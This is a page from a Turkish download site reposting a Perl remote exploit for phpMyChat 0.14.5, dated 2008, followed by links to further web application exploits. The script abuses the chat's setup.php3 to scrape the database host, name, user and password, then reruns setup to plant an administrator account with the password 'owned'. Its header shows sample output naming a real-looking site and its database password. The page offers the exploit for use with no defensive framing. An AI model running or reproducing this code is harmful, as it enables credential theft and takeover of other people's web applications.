FULL-TR.COM
Herşeyi FULL indir
Anasayfa
Program
Grafik
Oyun
Müzik
Video
Adult
Script
Exploit
PDA / Mobil
E-Kitap
Mizah
Exploit
/
Web Apps Exploit
/
phpMyChat 0.14.5 Remote Improper File Permissions Exploit
Eklenme Tarihi: 2008-10-20 23:00
####################################################################
#
# _____ _
# | ___| | _____ ___
# | |_ | |/ _ \ \ /\ / /
# | _| | | (_) \ V V /
# |_| |_|\___/ \_/\_/
# Security Group.
#
# * phpMyChat remote sploit *
# by sysbug
#
# C:\Perl\bin>perl pmc.pl www.kublooddrive.com /chat
# /* Mysql dump :
# * C_DB_HOST : localhost
# * C_DB_NAME : jhawk_pchat1
# * C_DB_USER : jhawk_pchat1
# * C_DB_PASS : vvejTjeLgB
# *
# * Adding Admin ....
# * login:jhawk
# * pwd:owned
# */
# C:\Perl\bin>
#
# Credits: all my friends!
use IO::Socket;
if(@ARGV < 2){
usage();
}
main();
sub sock(){
$ock=IO::Socket::INET->new(PeerAddr=>$host,PeerPort=>80,Proto=>'tcp',Timeout=>10)|| die " * s0ck null -\n";
print $ock "$path\r\n";
print $ock "Accept: */*\r\n";
print $ock "Accept-Language: pt\r\n";
print $ock "Accept-Encoding: gzip, deflate\r\n";
print $ock "User-Agent: l33t br0ws3r\r\n";
print $ock "Host: $host\r\n";
print $ock "Connection: Keep-Alive\r\n\r\n\r\n";
$path = '';
}
sub main(){
print "/*\n";
print " * sploit remote phpMychat\n";
print " * by sysbug\n";
print " *\n";
$host = $ARGV[0];
$folder = $ARGV[1];
$path = "GET $folder/chat/setup.php3?next=1 HTTP/1.1";
sock();
$result =1;
while($recv = <$ock>){
if($recv =~ /(C_DB_PASS|C_DB_USER|C_DB_NAME|C_DB_HOST)(.*)(VALUE=)(")(.*)(">)/){
$c++;
print " * Mysql dump :\n" if($result);
print " * $1 : $5\n";
$mysql[$c] = $5;
$result = '';
}
else{
print " * sploit failed! \n";
print " *\\ \n";
exit;
}
}
close($ock);
$path = "GET $folder/chat/setup.php3?next=2&Form_Send=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1 HTTP/1.1";
sock();
while($recv = <$ock>){
if($recv =~ /(ADM_LOG)(.*)(VALUE=)(")(.*)(">)/){
$c++;
$mysql[$c] = $5;
}
}
close($ock);
$pwd="owned";
$path = "GET $folder/chat/setup.php3?next=2&C_DB_TYPE=mysql&C_DB_HOST=$mysql[1]&C_DB_NAME=$mysql[2]&C_DB_USER=$mysql[3]&C_DB_PASS=$mysql[4]&C_MSG_TBL=messages&C_REG_TBL=reg_users&C_USR_TBL=users&C_BAN_TBL=ban_users&C_MSG_DEL=96&C_USR_DEL=4&C_REG_DEL=0&C_PUB_CHAT_ROOMS=Blood+Talk&C_PRIV_CHAT_ROOMS=&C_MULTI_LANG=1&C_LANGUAGE=english&C_REQUIRE_REGISTER=1&C_SHOW_ADMIN=1&C_SHOW_DEL_PROF=1&C_VERSION=1&C_BANISH=1&C_NO_SWEAR=1&C_SAVE=*&C_USE_SMILIES=1&C_HTML_TAGS_KEEP=simple&C_HTML_TAGS_SHOW=1&C_TMZ_OFFSET=0&C_MSG_ORDER=0&C_MSG_NB=20&C_MSG_REFRESH=10&C_SHOW_TIMESTAMP=1&C_NOTIFY=1&C_WELCOME=1&ADM_LOG=$mysql[5]&ADM_PASS=$pwd&Form_Send=3&Exist_Adm=1 HTTP/1.1";
sock();
if($mysql[5]){
print " *\n * Adding Admin ....\n * login:$mysql[5]\n * pwd:$pwd \n *\\ \n";
}
else{
print " * sploit failed! \n";
print " *\\ \n";
}
close($ock);
}
sub usage(){
print "/*\n";
print " * sploit remote phpMychat\n";
print " * by sysbug\n";
print " * usage: perl $0 xpl.pl <host>\n";
print " * example: perl $0 xpl.pl www.site.com\n";
print " * perl $0 xpl.pl www.site.com /chat\n";
print " */\n";
exit;
}
Yorumlar:
Henüz Yorum Eklenmedi
Yorum Ekle
Adınız
Mesajınız
Keywords:
Benzer Sayfalar (Similar Pages):
Bulunamadı. (not found)
Bu Sayfalarda İlginizi Çekebilir (The Links Bellow May Attract You As Well):
Exploit
/
Web Apps Exploit
/
Turbo Seek Null Byte Error Discloses Files to Remote Users
Exploit
/
Web Apps Exploit
/
PHP-Nuke 7.4 Remote Privilege Escalation
Exploit
/
Web Apps Exploit
/
TorrentTrader 1.0 RC2 SQL Injection Exploit
Exploit
/
Web Apps Exploit
/
AWStats Input Validation Hole in 'logfile'
Exploit
/
Web Apps Exploit
/
phpMyWebhosting SQL Injection Exploit
Exploit
/
Web Apps Exploit
/
PHP-NUKE version <= 6.9 'cid' sql injection Remote Exploit
Exploit
/
Web Apps Exploit
/
phpBB 2.0.6 search_id sql injection MD5 Hash Remote Exploit
Exploit
/
Web Apps Exploit
/
phpBB 2.0.5 SQL Injection password disclosure Exploit
Exploit
/
Web Apps Exploit
/
sendtemp.pl Read Access to Files
Exploit
/
Web Apps Exploit
/
Fastgraf's whois.cgi Remote Command Execution Exploit
Exploit
/
Web Apps Exploit
/
Poll It CGI v2.0 exploit
Exploit
/
Web Apps Exploit
/
CMScore SQL Injection Exploit
Exploit
/
Web Apps Exploit
/
MyPHP Forum 1.0 SQL Injection Exploit
Exploit
/
Web Apps Exploit
/
PostNuke PostWrap Module Remote Exploit
Exploit
/
Web Apps Exploit
/
PerlDesk 1.x SQL-Injection Exploit
Exploit
/
Web Apps Exploit
/
LiteForum 2.1.1 sql injection exploit
Exploit
/
Web Apps Exploit
/
Siteman <= 1.1.10 Remote Administrative Account Addition Exploit
Exploit
/
Web Apps Exploit
/
AWStats configdir Remote Command Execution Exploit (perl code)
Exploit
/
Web Apps Exploit
/
ITA Forum <= 1.49 SQL Injection Exploit
Exploit
/
Web Apps Exploit
/
PhpInclude.Worm - PHP Scripts Automated Arbitrary File Inclusion
Exploit
/
Web Apps Exploit
/
e107 include() Remote Exploit
Exploit
/
Web Apps Exploit
/
phpBB highlight Arbitrary File Upload (Santy.A)
Exploit
/
Web Apps Exploit
/
phpBB <= 2.0.10 Remote Command Execution Exploit (cgi version)
Exploit
/
Web Apps Exploit
/
Invision Power Board v2.0.0 - 2.0.2 Sql Injection Exploit
Exploit
/
Web Apps Exploit
/
phpBB <= 2.0.10 Remote Command Execution Exploit
Exploit
/
Web Apps Exploit
/
GFHost PHP GMail Remote Command Execution Exploit
Exploit
/
Web Apps Exploit
/
TWiki 20030201 search.pm Remote Command Execution Exploit
Exploit
/
Web Apps Exploit
/
UBB.threads 6.2.*-6.3.* one char bruteforce exploit
Exploit
/
Web Apps Exploit
/
ocPortal 1.0.3 Remote File Inclusion
Exploit
/
Web Apps Exploit
/
The Includer CGI <= 1.0 Remote Command Execution (new version2)